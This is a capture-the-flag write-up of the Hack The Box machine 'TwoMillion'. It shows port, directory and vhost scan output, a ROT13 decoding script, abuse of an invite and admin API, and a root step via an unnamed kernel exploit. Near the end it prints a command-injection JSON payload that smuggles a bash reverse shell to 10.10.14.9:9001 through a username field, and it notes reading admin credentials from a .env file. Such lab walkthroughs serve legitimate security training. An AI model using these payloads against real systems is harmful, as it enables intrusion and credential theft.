Twomillion

- 5 mins read

author: sysevil

OS: Linux Difficult: Easy

Port Scanner

sudo nmap -p- -v -oG fullscan -T4 10.10.11.221
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-14 18:19 -03
Initiating Ping Scan at 18:19
Scanning 10.10.11.221 [4 ports]
Completed Ping Scan at 18:19, 0.15s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 18:19
Scanning 2million.htb (10.10.11.221) [65535 ports]
Discovered open port 80/tcp on 10.10.11.221
Discovered open port 22/tcp on 10.10.11.221
SYN Stealth Scan Timing: About 22.34% done; ETC: 18:21 (0:01:48 remaining)
SYN Stealth Scan Timing: About 40.95% done; ETC: 18:21 (0:01:28 remaining)
SYN Stealth Scan Timing: About 56.54% done; ETC: 18:22 (0:01:10 remaining)
Completed SYN Stealth Scan at 18:22, 153.85s elapsed (65535 total ports)
Nmap scan report for 2million.htb (10.10.11.221)
Host is up (0.13s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 154.11 seconds
           Raw packets sent: 69757 (3.069MB) | Rcvd: 79462 (5.171MB)
                                                                                                                                                                                                                                            
┌──(parallels㉿kali-gnu-linux-2023)-[~/Documents/htb/machines/2Milllion]
└─$ sudo nmap -p 22,80 -sV -A  -oG fullscanHTTP -T4 10.10.11.221
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-14 18:27 -03
Nmap scan report for 2million.htb (10.10.11.221)
Host is up (0.13s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open  http    nginx
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Hack The Box :: Penetration Testing Labs
|_http-trane-info: Problem with XML parsing of /evox/about
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   129.17 ms 10.10.14.1 (10.10.14.1)
2   130.94 ms 2million.htb (10.10.11.221)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.32 seconds

Dir Scanner

dirsearch -u  http://2million.htb -e php,asp,aspx,jsp,md,text,bak,zip,toml,conf
  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, md, text, bak, zip, toml, conf | HTTP method: GET | Threads: 25 | Wordlist size: 14139

Output File: /home/parallels/reports/http_2million.htb/_24-02-14_18-21-08.txt

Target: http://2million.htb/

[18:21:08] Starting: 
[18:21:20] 200 -    2KB - /404                                              
[18:21:39] 401 -    0B  - /api                                              
[18:21:39] 401 -    0B  - /api/v1                                           
[18:21:40] 301 -  162B  - /assets  ->  http://2million.htb/assets/          
[18:21:40] 403 -  548B  - /assets/                                          
[18:21:47] 403 -  548B  - /controllers/                                     
[18:21:48] 301 -  162B  - /css  ->  http://2million.htb/css/                
[18:21:54] 301 -  162B  - /fonts  ->  http://2million.htb/fonts/            
[18:21:56] 302 -    0B  - /home  ->  /                                      
[18:21:57] 403 -  548B  - /images/                                          
[18:21:57] 301 -  162B  - /images  ->  http://2million.htb/images/
[18:22:00] 403 -  548B  - /js/                                              
[18:22:00] 301 -  162B  - /js  ->  http://2million.htb/js/                  
[18:22:02] 200 -    4KB - /login                                            
[18:22:02] 302 -    0B  - /logout  ->  /                                    
[18:22:15] 200 -    4KB - /register                                         
[18:22:27] 301 -  162B  - /views  ->  http://2million.htb/views/
  • /register/ is open

Vhost scanner

nothing.. here…

 ffuf -u http://2million.htb -H "Host: FUZZ.2million.htb"  -w /usr/share/wordlists/amass/subdomains.lst -fs 5 -mc 200

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://2million.htb
 :: Wordlist         : FUZZ: /usr/share/wordlists/amass/subdomains.lst
 :: Header           : Host: FUZZ.2million.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200
 :: Filter           : Response size: 5
________________________________________________

:: Progress: [8215/8215] :: Job [1/1] :: 306 req/sec :: Duration: [0:00:27] :: Errors: 0 ::

Infos.txt

  • Add the host name to etc/hosts
┌──(parallels㉿kali-gnu-linux-2023)-[~]
└─$ curl -I http://10.10.11.221                                                                                                                                                       
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 14 Feb 2024 21:16:33 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Location: http://2million.htb/

                                                                                                                                                                                                                                            
┌──(parallels㉿kali-gnu-linux-2023)-[~]
└─$ echo "10.10.11.221 2million.htb" | sudo tee -a /etc/hosts
10.10.11.221 2million.htb
  • Looking at the cookie, this site can be a PHP app. ( PHPSESSID )
  • Verify the javascript code.. we can find another routes

  • Some data are encrypted
  • With the following python script we can decrypt the text

def decrypt_rot13(text):
    decrypted_text = ""
    for char in text:
        if 'a' <= char <= 'z':
            decrypted_text += chr((ord(char) - ord('a') + 13) % 26 + ord('a'))
        elif 'A' <= char <= 'Z':
            decrypted_text += chr((ord(char) - ord('A') + 13) % 26 + ord('A'))
        else:
            decrypted_text += char
    return decrypted_text

encrypted_text = "Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb /ncv/i1/vaivgr/trarengr"
decrypted_text = decrypt_rot13(encrypted_text)
print(decrypted_text)

# In order to generate the invite code, make a POST request to /api/v1/invite/generate
  • Generate the invite

  • Login with the created user

  • Verify the docs of the api

  • Update your user as admin

  • Generate the config file..

Based on the output we can figure out, that this probably have some bash running at the backend

Command injection


{"username":"sysevil; w #"}

Reverse shell as www-data

{"username":"sysevil; bash -c 'bash -i >& /dev/tcp/10.10.14.9/9001 0>&1' #"}

user.txt

  • After getting a shell. Search for credentials and verify the .env file. This file contain the admin credentials.

root.txt

  • The machine not have any sudo bins running

But we have the version of the ubuntu, and we can search for exploits..

  • Transfer the files to the machine..

  • Compile.. with make all command.. and run

  • Open another SSH connection and at the same dir ./exp .. and you are root